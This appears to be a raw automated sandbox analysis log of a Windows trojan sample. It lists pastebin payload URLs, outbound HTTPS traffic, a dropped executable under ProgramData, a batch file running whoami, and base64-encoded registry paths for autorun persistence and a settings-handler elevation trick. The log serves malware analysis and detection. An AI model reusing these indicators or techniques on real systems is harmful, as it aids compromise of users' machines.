                          Source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0EFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/fR7B5m9EP
                          Source: ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880001000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0DA1000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000009.00000002.2301901265.000001DD56A61000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 0000000D.00000002.2276827527.000001B08F751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/fR7B5m9EX
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                          Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49731 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49745 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49755 version: TLS 1.2
                          Source: C:\ProgramData\uovan\svrreve.exeCode function: 2_2_00007FFD9BA11322 NtSetInformationProcess,2_2_00007FFD9BA11322
                          Source: C:\ProgramData\uovan\svrreve.exeCode function: 2_2_00007FFD9BA17B31 NtSetInformationProcess,2_2_00007FFD9BA17B31
                          Source: C:\ProgramData\uovan\svrreve.exeCode function: 13_2_00007FFD9BA0131813_2_00007FFD9BA01318
                          Source: C:\ProgramData\uovan\svrreve.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7924 -s 820
                          Source: ubes6SC7Vd.exe, 00000000.00000000.1687562602.00000258F2ACA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepidgins8 vs ubes6SC7Vd.exe
                          Source: ubes6SC7Vd.exeBinary or memory string: OriginalFilenamepidgins8 vs ubes6SC7Vd.exe
                          Source: ubes6SC7Vd.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: ubes6SC7Vd.exe, Program.csBase64 encoded string: 'U09GVFdBUkVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg=='
                          Source: ubes6SC7Vd.exe, lunnisvet.csBase64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUG9saWNpZXNcU3lzdGVt', 'U29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xTaGVsbFxPcGVuXGNvbW1hbmQ=', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUG9saWNpZXNcU3lzdGVt', 'U29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xTaGVsbFxPcGVuXGNvbW1hbmQ=', 'U1lTVEVNXFxDdXJyZW50Q29udHJvbFNldFxcQ29udHJvbFxcTHNh'
                          Source: svrreve.exe.0.drBinary string: \Device\Afd\Mio
                          Source: svrreve.exe.0.drBinary string: Failed to open \Device\Afd\Mio:
                          Source: classification engineClassification label: mal100.troj.evad.winEXE@16/18@2/3
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ubes6SC7Vd.exe.logJump to behavior
                          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8076
                          Source: C:\ProgramData\uovan\svrreve.exeMutant created: NULL
                          Source: C:\ProgramData\uovan\svrreve.exeMutant created: \Sessions\1\BaseNamedObjects\bC93EeUVlC
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
                          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7924
                          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7536
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeFile created: C:\Users\user\AppData\Local\Temp\tmpFD97.tmpJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD97.tmp.bat""
                          Source: ubes6SC7Vd.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: ubes6SC7Vd.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: ubes6SC7Vd.exeVirustotal: Detection: 56%
                          Source: ubes6SC7Vd.exeReversingLabs: Detection: 44%
                          Source: ubes6SC7Vd.exeString found in binary or memory: -helpPrint help (see more with '--help')Print help (see a summary with '-h')versionPrint this message or the help of the given subcommand(s)subcommandCOMMANDPrint help for the subcommand(s)
                          Source: ubes6SC7Vd.exeString found in binary or memory: -helpPrint help (see more with '--help')Print help (see a summary with '-h')versionPrint this message or the help of the given subcommand(s)subcommandCOMMANDPrint help for the subcommand(s)
                          Source: ubes6SC7Vd.exeString found in binary or memory: were provided was provided--helphelp
                          Source: ubes6SC7Vd.exeString found in binary or memory: were provided was provided--helphelp
                          Source: ubes6SC7Vd.exeString found in binary or memory: {before-help}{about-with-newline}
                          Source: ubes6SC7Vd.exeString found in binary or memory: {all-args}{after-help}{before-help}{about-with-newline}
                          Source: ubes6SC7Vd.exeString found in binary or memory: {usage-heading} {usage}{after-help}Usage:
                          Source: ubes6SC7Vd.exeString found in binary or memory: &{before-help}{about-with-newline}
                          Source: ubes6SC7Vd.exeString found in binary or memory: optionstab before-help{}
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeFile read: C:\Users\user\Desktop\ubes6SC7Vd.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\ubes6SC7Vd.exe "C:\Users\user\Desktop\ubes6SC7Vd.exe"
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess created: C:\ProgramData\uovan\svrreve.exe "C:\ProgramData\uovan\svrreve.exe"
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD97.tmp.bat""
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 7
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
                          Source: unknownProcess created: C:\ProgramData\uovan\svrreve.exe "C:\ProgramData\uovan\svrreve.exe"
                          Source: C:\ProgramData\uovan\svrreve.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7924 -s 820
                          Source: unknownProcess created: C:\ProgramData\uovan\svrreve.exe "C:\ProgramData\uovan\svrreve.exe"
                          Source: C:\ProgramData\uovan\svrreve.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8076 -s 832
                          Source: C:\ProgramData\uovan\svrreve.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7536 -s 2476
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess created: C:\ProgramData\uovan\svrreve.exe "C:\ProgramData\uovan\svrreve.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD97.tmp.bat""Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 7Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoamiJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: version.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\whoami.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\whoami.exeSection loaded: authz.dllJump to behavior
                          Source: C:\Windows\System32\whoami.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\whoami.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Windows\System32\whoami.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: version.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: version.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: ubes6SC7Vd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: ubes6SC7Vd.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: ubes6SC7Vd.exeStatic file information: File size 1972736 > 1048576
                          Source: ubes6SC7Vd.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1c6c00
                          Source: ubes6SC7Vd.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: svrreve.exe, 00000002.00000002.2291618512.0000026DD95F9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\a\bore\bore\target\x86_64-pc-windows-msvc\release\deps\bore.pdb source: ubes6SC7Vd.exe, svrreve.exe.0.dr
                          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: svrreve.exe, 00000002.00000002.2291618512.0000026DD95F9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: pC:\ProgramData\uovan\svrreve.PDB source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F86000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: System.Windows.Forms.ni.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Drawing.ni.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbw source: svrreve.exe, 00000002.00000002.2291618512.0000026DD9570000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\System.pdbe' source: svrreve.exe, 00000002.00000002.2291618512.0000026DD9609000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Drawing.ni.pdbRSDS source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.pdb` source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: \assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb" source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Core.ni.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: C:\ProgramData\uovan\svrreve.PDBm source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: System.Net.Http.pdbSystem.Management.dll source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Windows.Forms.pdb0 source: WER6CB.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.ni.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.pdbra source: svrreve.exe, 00000002.00000002.2291618512.0000026DD961C000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: svrreve.exe, 00000002.00000002.2291618512.0000026DD9609000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.pdbR source: svrreve.exe, 00000002.00000002.2291618512.0000026DD961C000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb=. source: svrreve.exe, 00000002.00000002.2291618512.0000026DD95F9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdb source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbZ source: svrreve.exe, 00000002.00000002.2291618512.0000026DD9570000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.ni.pdbRSDS source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: D:\a\bore\bore\target\x86_64-pc-windows-msvc\release\deps\bore.pdbz source: ubes6SC7Vd.exe, svrreve.exe.0.dr
                          Source: Binary string: System.Configuration.ni.pdb source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Net.Http.pdb source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F86000.00000004.00000800.00020000.00000000.sdmp, WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: C:\ProgramData\uovan\svrreve.PDB source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: System.Configuration.pdb source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Xml.pdb source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.pdb source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F86000.00000004.00000800.00020000.00000000.sdmp, WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Windows.Forms.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.pdb source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F86000.00000004.00000800.00020000.00000000.sdmp, WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
